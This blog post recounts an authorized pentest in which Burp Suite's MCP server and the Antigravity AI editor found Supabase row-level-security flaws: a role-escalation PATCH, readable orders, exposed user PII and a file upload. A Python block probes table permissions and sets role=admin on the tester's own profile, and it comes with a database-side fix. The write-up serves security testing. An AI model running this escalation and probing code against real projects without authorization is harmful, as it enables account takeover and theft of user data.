May 15, 2026
How we used Burp Suite MCP with Antigravity AI to exploit a Supabase-based application
Jawad Mahdi
As we all know, AI is changing bug bounty and web application pentesting for good, and people are worried about AI replacing their bug bounty and pentesting jobs. So we thought: why not use AI alongside us to find bugs in a company? We already know the basics; AI just helps us automate them faster. In this article we show how we used Burp Suite's MCP server with Antigravity, Google's free AI editor (running Gemini Flash 3), to exploit a Supabase-based application.
Before we begin: our goal is not to use AI to hack an unauthorized company, nor to tell anyone to. The application we tried this on was part of an authorized pentest project. We just wanted to see whether AI could find any bugs, because we had assumed the system was secure since it was built on Supabase.
Phase 1: Building the Context for AI (Manual Exploration)
Our goal was to manually exercise every endpoint, that is, every page and feature available on the target website. The more traffic you capture in Burp Suite's HTTP history, the more context the AI has to reason over. So we did a thorough manual exploration of the website, navigating every path, interacting with every button, and using every function we were authorized to use.
This populated Burp Suite's HTTP history and Logger, which became the AI's "knowledge": a complete map of requests, headers, and state changes.
Phase 2: The Bridge (Antigravity & Burp's MCP)
We first installed Burp's MCP Server extension and connected Antigravity's AI to it.
To verify the connection, we started with a simple sanity check:
Prompt: "List five entries from the HTTP history."
Once it confirmed the traffic, we tested its ability to interact with Burp's tools:
Prompt: "Before we start, can you create a Repeater tab or send a normal request?"
With the bridge confirmed, the AI was no longer just a chatbot: it was talking to us and driving Burp at the same time.
Phase 3: Scoping and Priming
We defined the boundaries clearly by giving the AI the target domains. Our goal was a Supabase-focused pentest, looking specifically for common misconfigurations such as Row Level Security (RLS) bypasses or exposed debug routes.
Prompt: "We have three URLs in scope. This is a Supabase app we built… Please deep‑crawl or study the existing history, read any JS bundles, find all endpoints, do threat modeling, and then perform a Supabase‑focused pentest."
Phase 4: The Pivot (Moving Beyond False Positives)
Initially, the AI flagged a classic stored XSS. On manual verification it turned out to be a false positive: the output was properly encoded in the final render. The AI had assumed the payload worked because it saw an HTTP 200, but it could not verify this in the backend since we did not have admin credentials.
After this, we provided legitimate test credentials (a normal user account). Using them, the AI found these table names:
Phase 5: The Exploitation
Once the AI understood the API's behaviour, it began finding serious architectural flaws. The most critical discovery was a privilege escalation bug: an authenticated user could modify their own role field in a PATCH request and gain admin access.
We manually tested it using curl and confirmed the vulnerability.
We wrote a bash script that performs basic queries against several API endpoints (products, orders, profiles, and so on). It takes the anon key (the public API key), checks what RLS allows and disallows, and then attempts to manipulate each endpoint using every HTTP method.
Prompt: "Now that you found privilege escalation to admin, can you re-run these checks and report how many API endpoints are exploitable using the bash script I provided?"
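The two checks described above, the role-escalation PATCH and the per-table RLS matrix, as an added example in Python. This is not the authors' bash script (which is not reproduced on the page) and not Supabase's own code; the project URL, the `profiles`/`orders`/`products` tables, the `note` column, the row id `u1` and the `FakeSupabase` transport are constructed for illustration. The point a practitioner should take from it is the `classify` function: PostgREST returns HTTP 200 for a SELECT that RLS has filtered and for a PATCH/DELETE that RLS made match zero rows, so a "200" is not evidence that a write landed; ask PostgREST to echo the rows it touched and read the row back.

```python
import json
import urllib.error
import urllib.request


def build_request(base_url, anon_key, method, table, *, jwt=None, params="", body=None):
    """Build a PostgREST request the way Supabase's gateway expects it: the anon key in
    `apikey`, a user JWT (or the anon key again, to test the anon role) as the bearer,
    and `Prefer: return=representation` so PostgREST echoes the rows a write touched."""
    headers = {"apikey": anon_key, "Authorization": f"Bearer {jwt or anon_key}"}
    data = None
    if body is not None:
        data = json.dumps(body).encode()
        headers["Content-Type"] = "application/json"
    if method in ("POST", "PATCH", "DELETE"):
        headers["Prefer"] = "return=representation"
    url = f"{base_url.rstrip('/')}/rest/v1/{table}{params}"
    return urllib.request.Request(url, data=data, method=method, headers=headers)


def http_send(req):
    """Real transport: (status, decoded JSON or None). Any callable of this shape works."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            status, raw = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        status, raw = err.code, err.read()
    try:
        return status, (json.loads(raw) if raw else None)
    except ValueError:
        return status, raw.decode(errors="replace")


def classify(method, status, body):
    """RLS never answers "forbidden" for rows it hides: a SELECT just omits them and a
    PATCH/DELETE silently matches zero rows, so a 2xx alone is not proof of access.
    Only a non-empty echoed result is. (An INSERT that violates a policy does fail.)"""
    if status in (401, 403):
        return "denied"
    if status >= 400:
        return f"error:{status}"
    if method == "POST":
        return "allowed"
    return "allowed" if body else "filtered"  # [] means RLS let nothing through


def probe_matrix(base_url, anon_key, tables, own_row_id, *, jwt=None, send=http_send):
    """For each table, try each method and record what RLS lets this identity do.
    Writes target only a row the tester owns; the `note` column is an assumption."""
    plan = (
        ("GET", "?select=*&limit=5", None),
        ("POST", "", {"note": "rls-probe"}),
        ("PATCH", f"?id=eq.{own_row_id}", {"note": "rls-probe"}),
        ("DELETE", f"?id=eq.{own_row_id}", None),
    )
    matrix = {}
    for table in tables:
        matrix[table] = {}
        for method, params, body in plan:
            req = build_request(base_url, anon_key, method, table,
                                jwt=jwt, params=params, body=body)
            status, resp = send(req)
            matrix[table][method] = classify(method, status, resp)
    return matrix


def try_role_escalation(base_url, anon_key, jwt, user_id, *, send=http_send):
    """The bug from the article: PATCH your own `profiles` row with role=admin.
    Confirm by reading the row back rather than trusting the PATCH's status code."""
    req = build_request(base_url, anon_key, "PATCH", "profiles", jwt=jwt,
                        params=f"?id=eq.{user_id}", body={"role": "admin"})
    status, resp = send(req)
    if classify("PATCH", status, resp) != "allowed":
        return False
    req = build_request(base_url, anon_key, "GET", "profiles", jwt=jwt,
                        params=f"?id=eq.{user_id}&select=role")
    _, rows = send(req)
    return bool(rows) and rows[0].get("role") == "admin"


class FakeSupabase:
    """Constructed stand-in for a misconfigured project so the block runs offline:
    profiles can be PATCHed by its owner including `role` (the bug) but not deleted;
    orders and products are readable by anyone (orders being the leak), never writable."""

    def __init__(self):
        self.rows = {"profiles": [{"id": "u1", "role": "user"}],
                     "orders": [{"id": 7, "user_id": "u2", "total": 99}],
                     "products": [{"id": 1, "name": "widget"}]}

    def __call__(self, req):
        method = req.get_method()
        table = req.full_url.split("/rest/v1/", 1)[1].partition("?")[0]
        rows = self.rows.get(table)
        if rows is None:
            return 404, {"message": f"relation {table} not found"}
        if method == "GET":
            return 200, rows
        if method == "PATCH" and table == "profiles":
            rows[0].update(json.loads(req.data))
            return 200, [rows[0]]
        if method in ("PATCH", "DELETE"):
            return 200, []  # no policy matched: zero rows affected, still HTTP 200
        return 403, {"code": "42501", "message": "new row violates row-level security policy"}
```

Against a real project, leave `send` at its default `http_send`, pass the anon key from the JS bundle and a JWT obtained by logging in as the test user, and run `probe_matrix` once with `jwt=None` (anon role) and once with the user JWT; the difference between the two matrices is the authorization model the app actually enforces. For the escalation itself the fix is on the database side: the `authenticated` role should not hold UPDATE on the `role` column at all (revoke the table-wide UPDATE grant and re-grant it only on the columns users may change, or reject role changes in a trigger), since an RLS policy's `WITH CHECK` cannot compare the new row to the old one.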
Antigravity also found a data leak: all orders were readable, which we confirmed manually with a curl command.
It also found PII for many users, and we confirmed this with curl as well.
Lastly, it demonstrated read/write access by uploading a .txt file, as a bug bounty hunter would for a proof of concept.
We confirmed this with curl and by navigating to the file in a browser: the file was there.
So, to summarize the findings from Antigravity AI, this is what we found:
The Report:
Here's the link to the chat history: https://tinyurl.com/chat-history-md
A quick note: the prompts shown in the report were rewritten in a proper formal style. Check the raw logs for the actual prompts.
The Pentest was conducted by Jawad Mahdi / Zabir Abdullah / Mirash Ahmed Chowdhury